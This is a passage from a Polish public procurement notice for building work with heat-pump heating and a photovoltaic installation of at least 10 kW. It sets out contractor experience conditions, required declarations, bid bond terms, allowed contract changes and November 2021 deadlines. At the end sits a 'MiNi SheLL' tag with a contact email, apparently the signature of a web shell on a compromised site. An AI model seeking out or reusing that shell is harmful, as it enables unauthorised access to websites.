prowadzenia działalności jest krótszy – w tym okresie, zrealizował w sposób należyty co najmniej jedno zamówienie polegające na:<br/>a.	budowie budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego, którego instalacja centralnego ogrzewania oparta jest na pompie ciepła oraz wyposażonego w instalację fotowoltaiczną o mocy nie mniejszej niż 10 kW, <br/>lub<br/>b.	nadbudowie, rozbudowie, przebudowie lub remoncie budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego o powierzchni objętej nadbudową, rozbudową, przebudową lub remontem nie mniejszej niż 250 m2 i zakresem nadbudowy, rozbudowy, przebudowy lub remontu obejmującym co najmniej wykonanie instalacji centralnego ogrzewania opartego na pompie ciepła oraz instalacji fotowoltaicznej o mocy nie mniejszej niż 10 kW.<br/><br/>Zamawiający wyjaśnia, że użyte w warunku udziału w postępowaniu określenia „budynku użyteczności publicznej”, „budynku zamieszkania zbiorowego” i „budynku mieszkalnego wielorodzinnego” odpowiadają definicjom zawartym w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie. <br/><br/>UWAGA! <br/>-	dopuszcza się wykazanie przez Wykonawcę posiadania doświadczenia wymaganego w ramach warunku udziału w postępowaniu zdobytego w ramach realizacji różnych inwestycji, tj. dopuszcza się wykazanie posiadania doświadczenia w budowie, nadbudowie, rozbudowie, przebudowie lub remoncie budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego, w ramach których została wykonana instalacja centralnego ogrzewania opartego o pompę ciepła oraz posiadania doświadczenia w budowie, nadbudowie, rozbudowie, przebudowie lub remoncie innego budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego w ramach których została wykonana instalacji fotowoltaiczna o mocy nie mniejszej niż 10 kW, <br/>-	dopuszcza się wykazanie przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania doświadczenia wymaganego w ramach warunku udziału w postępowaniu zdobytego w ramach indywidualnych realizacji inwestycji przez każdego z Wykonawców, tj. dopuszcza się wykazanie posiadania doświadczenia przez jednego Wykonawcę w budowie, nadbudowie, rozbudowie, przebudowie lub remoncie budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego, w ramach których została wykonana instalacja centralnego ogrzewania opartego o pompę ciepła oraz posiadania doświadczenia przez drugiego Wykonawcę w budowie, nadbudowie, rozbudowie, przebudowie lub remoncie budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego, w ramach których została wykonana instalacji fotowoltaiczna o mocy nie mniejszej niż 10 kW, <br/>-	nie dopuszcza się wykazania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania doświadczenia wymaganego w ramach warunku udziału w postępowaniu poprzez zsumowanie powierzchni nadbudowy, rozbudowy, przebudowy lub remontu budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego wykonanych indywidualnie przez każdego z Wykonawców, tj. w przypadku, gdy warunek udziału w postępowaniu wykazywany jest poprzez posiadanie doświadczenia w nadbudowie, rozbudowie, przebudowie lub remoncie budynku użyteczności publicznej, budynku zamieszkania zbiorowego lub budynku mieszkalnego wielorodzinnego, w ramach których została wykonana instalacja centralnego ogrzewania oparta o pompę ciepła lub instalacja fotowoltaiczna o mocy nie mniejszej niż 10 kW, każdorazowa nadbudowa, rozbudowa, przebudowa lub remont musi wynosić nie mniej niż 250 m2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie przewiduje żądania podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącym zdolności technicznej lub zawodowej, Zamawiający żąda od Wykonawcy przedstawienia: wykazu robót budowalnych wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których roboty budowalne zostały wykonane, sporządzonego wg wzoru stanowiącego Załącznik nr 6 do SWZ.<br/>Do wykazu robót budowalnych, o których mowa powyżej Wykonawca załącza dowody określające, czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje żądania przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>a.	oświadczenie własne Wykonawcy (Wykonawców wspólnie ubiegających się o udzielenie zamówienia), o którym mowa w art. 125 ust. 1 Pzp, tj. oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 do SWZ, <br/>a nadto (gdy dotyczy):<br/>b.	oświadczenie własne podmiotu udostępniającego Wykonawcy zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełniania warunków udziału w postępowaniu w zakresie, w jakim Wykonawca polega na zasobach tego podmiotu – Załącznik nr 3 do SWZ, <br/>c.	zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, o którym mowa w Dziale IV – Kwalifikacja podmiotowa wykonawców, Rozdz. 3 – Udostępnianie zasobów ust. 3 i ust. 4 SWZ – Załącznik nr 4 do SWZ, <br/>d.	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 3 Pzp, o którym mowa w Dziale IV – Kwalifikacja podmiotowa wykonawców, Rozdz. 5 – Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ust. 4 SWZ – Załącznik nr 5 do SWZ, <br/>e.	pełnomocnictwo – w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w Dziale IV – Kwalifikacja podmiotowa wykonawców, Rozdz. 5 – Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ust. 2 SWZ, <br/>f.	pełnomocnictwo lub inny dokument potwierdzający umocowanie osoby działającej w imieniu Wykonawcy – w przypadku, gdy umocowanie osoby działającej w imieniu Wykonawcy nie wynika z dokumentów rejestrowych, w szczególności informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości: 3.000,00 (trzech tysięcy) złotych. <br/>2.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 i art. 98ust. 2 PZP. <br/>3.	Wadium może być wnoszone w jednej lub kilku formach wskazanych w art. 97 ust. 7 Pzp, w zależności od wyboru Wykonawcy, tj. w: <br/>a.	pieniądzu,<br/>b.	gwarancjach bankowych <br/>c.	gwarancjach ubezpieczeniowych, <br/>d.	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego, numer rachunku: 45 85910007 2200 0850 0061 0005, wskazując w tytule przelewu dane umożliwiające identyfikację zabezpieczanej oferty (określenie Wykonawcy i oznaczenie postępowania). Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli rachunek bankowy Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>5.	Wadium wnoszone w formach, o których mowa w ust. 3 lit. b – d powyżej Wykonawca przekazuje w oryginale, w postaci elektronicznej, z zastrzeżeniem zachowania form prawnych wymaganych przez przepisy bezwzględnie obowiązującego prawa. <br/>6.	Z treści wadium wnoszonego w formach, o których mowa w ust. 3 lit. b – d powyżej powinno wynikać bezwarunkowe, na pierwsze żądanie Zamawiającego zobowiązanie gwaranta/poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP. Wierzytelność z tytułu gwarancji/poręczenia nie może być przedmiotem przelewu na rzecz osoby trzeciej. <br/>7.	Wadium wniesione w formie gwarancji lub poręczenia musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. <br/>8.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP. <br/>9. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 – 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2.	W przypadku określonym w ust. 1 powyżej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zostać złożone wraz z ofertą. <br/>3.	Oświadczenia, o których mowa w art. 125 ust.1 Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają indywidualnie, w przypadku braku podstaw do wykluczenia – każdy z Wykonawców oraz w przypadku spełniania warunków udziału w postępowaniu – każdy z Wykonawców w zakresie, w jakim wykazuje spełnienie warunku lub warunków udziału w postępowaniu. <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, o którym mowa w art. 117 ust. 3 Pzp, z którego wynika, które roboty dostawy lub usługi wykona każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony dopuszczają zmianę Umowy w zakresie i na warunkach jak niżej:<br/>a.	wprowadzenie rozwiązań zamiennych w stosunku do rozwiązań wskazanych w dokumentacji projektowej lub rozwiązań, w tym technologii nowych, nieuwzględnionych w dokumentacji projektowej, jeżeli wprowadzenie rozwiązań zamiennych lub nowych jest konieczne z uwagi na wady dokumentacji projektowej lub jest uzasadnione obiektywnymi okolicznościami, w tym zasadami wiedzy technicznej, w szczególności, jeśli rozwiązania zamienne lub nowe są bardziej optymalne od rozwiązań wskazanych w dokumentacji projektowej, z zastrzeżeniem uwzględnienia kosztów rozwiązania zamiennego lub nowego w całym jego cyklu życia,<br/>b.	wprowadzenie zmian w zakresie materiałów, parametrów technicznych, sposobu i zakresu wykonania przedmiotu Umowy, w sytuacji gdy zmiana jest konieczna lub uzasadniona:<br/>-	zmianą stanu prawnego, <br/>-	wadami dokumentacji projektowej, <br/>-	niedostępnością na runku materiałów lub urządzeń spowodowaną zaprzestaniem produkcji lub wycofaniem z rynku materiałów lub urządzeń, <br/>-	zwiększeniem bezpieczeństwa realizacji robót budowalnych oraz bezpieczeństwa użytkowania przedmiotu Umowy, <br/>-	usprawnieniem procesu budowy, przy równoczesnym uzyskaniu założonego efektu użytkowego, <br/>-	wystąpieniem warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, w tym napotkanie niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji, innych obiektów budowlanych lub ich elementów, bądź wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, które mogą skutkować, w świetle dotychczasowych założeń, niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, <br/>c.	wprowadzenie zmiany wysokości wynagrodzenia w przypadkach, o których mowa w lit. a i b powyżej oraz lit. d tiret drugie poniżej, z zastrzeżeniem, że całkowita wartość zmian nie może przekroczyć 20% wartości całkowitego wynagrodzenia Wykonawcy określonego w § 7 ust. 1 Umowy, <br/>d.	wprowadzenie zmiany terminu realizacji przedmiotu Umowy:<br/>-	w przypadkach określonych w lit. a i b powyżej, <br/>-	w przypadku konieczności przeprowadzenia dodatkowych badań, ekspertyz lub ocen warunkujących wykonanie przedmiotu Umowy, <br/>-	w przypadku, gdy realizacja przedmiotu Umowy zgodnie z Harmonogramem nie jest możliwa z uwagi na warunki atmosferyczne uniemożliwiające dochowania wymogów technicznych lub technologicznych, <br/>-	w przypadku, gdy realizacja przedmiotu Umowy zgodnie z Harmonogramem nie jest możliwa z uwagi na sytuację epidemiologiczną, <br/>-	w przypadku przedłużania się okresu osiągania parametrów technologicznych, z przyczyn niezależnych od Wykonawcy, <br/>-	w przypadku wystąpienia kolizji z niezinwentaryzowaną infrastrukturą zakrytą uniemożlwiającą wykonanie robót, <br/>-	w przypadku przedłużania się okresu uzyskiwania pozwoleń, zezwoleń i zgód, z przyczyn niezależnych od Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-23 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com